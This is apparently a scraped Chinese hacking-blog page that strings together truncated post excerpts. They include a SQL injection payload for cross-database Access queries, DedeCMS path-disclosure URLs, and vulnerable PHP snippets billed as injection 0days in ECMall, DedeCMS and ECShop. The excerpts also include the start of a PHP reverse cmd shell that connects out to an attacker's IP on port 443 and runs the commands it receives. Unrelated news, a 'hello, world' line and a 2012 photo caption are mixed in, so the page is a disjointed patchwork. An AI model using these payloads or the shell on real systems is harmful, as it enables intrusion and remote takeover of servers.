
娱乐来续集,欢迎留言,欢迎吐槽,欢迎感谢~~~. 1.Access跨库查询. and 1=2 union select 1,2,user,4,5,6 from [C:\root\data\%23db1.asp].admin 条件:分站有注入,知道对方站的路径可以用这个方法来


最近日本一款马桶引发多家科技网站报导,因为它内置 android 系统。 名为“Satis”的智能马桶由 Lixil 生产,其内置 android 系统之余还配备了蓝牙,用家只要安装专用

一些 dedecms v5.7 爆绝对路径的方法收集

1、 xiaoxiaoabc 发表于 2012-12-20 20:54 没有找到评论的相对字体颜色,报错信息。 2、 冰封 发表于 2012-12-20 21:30 dede爆路径 http://localhost/dedecms/plus/carbuyaction.php?dopost=return&code=bank http://localhost/dedecms/plus/carbuyaction.php?dopost=return&code=cod 上次看代码的时候看测试发现的 具体不知道是否通杀 也弄

ecmall 2.3.0-0918-scgbk 注入

function _get_conditions() { /* 搜索条件 */ $conditions = "1 = 1"; if (trim($_GET['keyword'])) { $str = "LIKE '%" . trim($_GET['keyword']) . "%'"; $conditions .= " AND (goods_name {$str} OR brand {$str} OR cate_name {$str})"; echo $conditions; exit; } if ($_GET['character']) { switch ($_GET['character']) { case 'show': $conditions .= " AND if_show = 1"; break; case 'hide': $conditions .= " AND if_show = 0"; break; case 'closed': $conditions

dedecms v5.7 最新注入 0day - 鸡肋

Team:cdeplay Team by j8g }elseif ($dopost == 'save'){ if(isset($mtypeidarr) && is_array($mtypeidarr)) { $delids = '0'; $mtypeidarr = array_filter($mtypeidarr, 'is_numeric'); foreach($mtypeidarr as $delid) { $delids .= ','.$delid; unset($groupname[$delid]); } $query = "DELETE FROM `#@__member_group` WHERE id in ($delids) AND mid='$cfg_ml->M_ID'"; $dsql->ExecNoneQuery($query); $sql="SELECT id FROM `#@__member_friends` WHERE groupid in ($delids) AND mid='$cfg_ml->M_ID'"; $db->SetQuery($sql); $db->Execute(); while($row = $db->GetArray()) { $query2 = "UPDATE `#@__member_friends` SET groupid='1' WHERE id='{$row['id']}' AND mid='$cfg_ml->M_ID'"; $dsql->ExecNoneQuery($query2); } } foreach

ECShop_V2.7.3_GBK_release1106 注入 0day

C0deplay Team    j8g 看代码 /* 修改个人资料的处理 */ elseif ($action == 'act_edit_profile') { include_once(ROOT_PATH . 'includes/lib_transaction.php'); $birthday = trim($_POST['birthdayYear']) .'-'. trim($_POST['birthdayMonth']) .'-'. trim($_POST['birthdayDay']); $email = trim($_POST['email']); $other['msn'] = $msn = isset($_POST['extend_field1']) ? trim($_POST['extend_field1']) : ''; $other['qq'] = $qq = isset($_POST['extend_field2']) ? trim($_POST['extend_field2']) : ''; $other['office_phone'] = $office_phone = isset($_POST['extend_field3']) ? trim($_POST['extend_field3']) : ''; $other['home_phone'] = $home_phone = isset($_POST['extend_field4']) ? trim($_POST['extend_field4']) :

一 PHP 反弹 Cmd Shell 脚本

<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $os = substr(PHP_OS,0,3); $ipaddr = ''; $port = '443'; $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; if($os == 'WIN') { $env = array('path' => 'c:\\windows\\system32'); } else { $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } if(function_exists('fsockopen')) { $sock = fsockopen($ipaddr,$port); fwrite($sock,$msg); while ($cmd = fread($sock,1024)) { if (substr($cmd,0,3) == 'cd ') { $cwd = trim(substr($cmd,3,-1)); chdir($cwd);

hello, world

核总拍摄此图于‎:2012‎年‎10‎月‎3‎日,‏‎5:53:30,拍摄地点:东崖绝壁 公元2012年12月22日,早上太阳正常升起…… 恭喜